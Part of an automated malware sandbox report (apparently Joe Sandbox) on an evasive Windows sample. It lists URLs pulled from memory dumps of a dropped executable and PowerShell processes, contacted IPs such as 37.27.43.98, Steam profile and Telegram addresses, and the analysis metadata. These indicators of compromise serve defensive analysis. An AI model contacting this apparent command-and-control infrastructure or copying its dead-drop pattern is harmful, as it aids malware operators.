                                                                                                                                        https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=engli168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drfalse
                                                                                                                                            		high
                                                                                                                                            https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drfalse
                                                                                                                                              		high
                                                                                                                                              http://crl.micropowershell.exe, 00000005.00000002.1563697900.00000000086C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1610889169.000000000780F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1703471346.0000000006ED0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://raw.githubusercontent.comYYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A78000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://steamcommunity.com/profiles/76561199804377619_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://37.27.43.98/r168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        https://37.27.43.98/s168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000005.00000002.1555257254.0000000005177000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1596759724.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1655620114.0000000005015000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://www.google.com/recaptcha/168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://checkout.steampowered.com/168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://raw.githubusercontent.comYYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://37.27.43.98/v168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    http://www.microsoft.coUpowershell.exe, 0000000A.00000002.1610889169.000000000780F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=LjouqOsWbS168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://steamcommunity.com/profiles/76561199804377619i168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://store.steampowered.com/;168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://store.steampowered.com/about/76561199804377619[1].htm0.14.drfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://community.cloudflare.steamstatic.com/168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://community.cloudflare.steamstatic.com/public/javascript/reportedc168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://steamcommunity.com/my/wishlist/168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://t.me/168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&l=76561199804377619[1].htm0.14.drfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://store.steampowered.com/;)168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://store.steampowered.com/;a(168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837734458.0000000000A78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://web.telegram.org168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://github.comYYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A46000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=INiZALwvDIbb168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://help.steampowered.com/en/168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://steamcommunity.com/profiles/76561199804377619tlq168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.00000000009CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://steamcommunity.com/market/168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://store.steampowered.com/news/168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://contoso.com/Licensepowershell.exe, 0000000D.00000002.1672248672.0000000005F28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high

                                                                                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                                                                                  Public IPs

                                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                  104.102.49.254
                                                                                                                                                                                                                  		steamcommunity.comUnited States
                                                                                                                                                                                                                  		16625AKAMAI-ASUSfalse
                                                                                                                                                                                                                  37.27.43.98
                                                                                                                                                                                                                  		unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                                                                  		39232UNINETAZfalse
                                                                                                                                                                                                                  20.233.83.145
                                                                                                                                                                                                                  		github.comUnited States
                                                                                                                                                                                                                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                  185.199.110.133
                                                                                                                                                                                                                  		raw.githubusercontent.comNetherlands
                                                                                                                                                                                                                  		54113FASTLYUSfalse
                                                                                                                                                                                                                  149.154.167.99
                                                                                                                                                                                                                  		t.meUnited Kingdom
                                                                                                                                                                                                                  		62041TELEGRAMRUfalse

                                                                                                                                                                                                                  General Information

                                                                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                  Analysis ID:1579768
                                                                                                                                                                                                                  Start date and time:2024-12-23 08:50:42 +01:00
                                                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                  Overall analysis duration:0h 7m 30s
                                                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                  Report type:full
                                                                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                  Number of analysed new started processes analysed:19
                                                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                                                  Sample name:YYjRtxS70h.exe
                                                                                                                                                                                                                  renamed because original name is a hash value
                                                                                                                                                                                                                  Original Sample Name:5a59ce92b07de68c0be8fbd7944214e2.exe
                                                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                                                  Classification:mal88.evad.winEXE@21/24@4/5
                                                                                                                                                                                                                  EGA Information:
                                                                                                                                                                                                                  • Successful, ratio: 50%
                                                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                                                                  • Number of executed functions: 239
                                                                                                                                                                                                                  • Number of non-executed functions: 26
                                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                                  • Found application associated with file extension: .exe

                                                                                                                                                                                                                  Warnings

                                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 20.109.210.53
                                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 2616 because it is empty
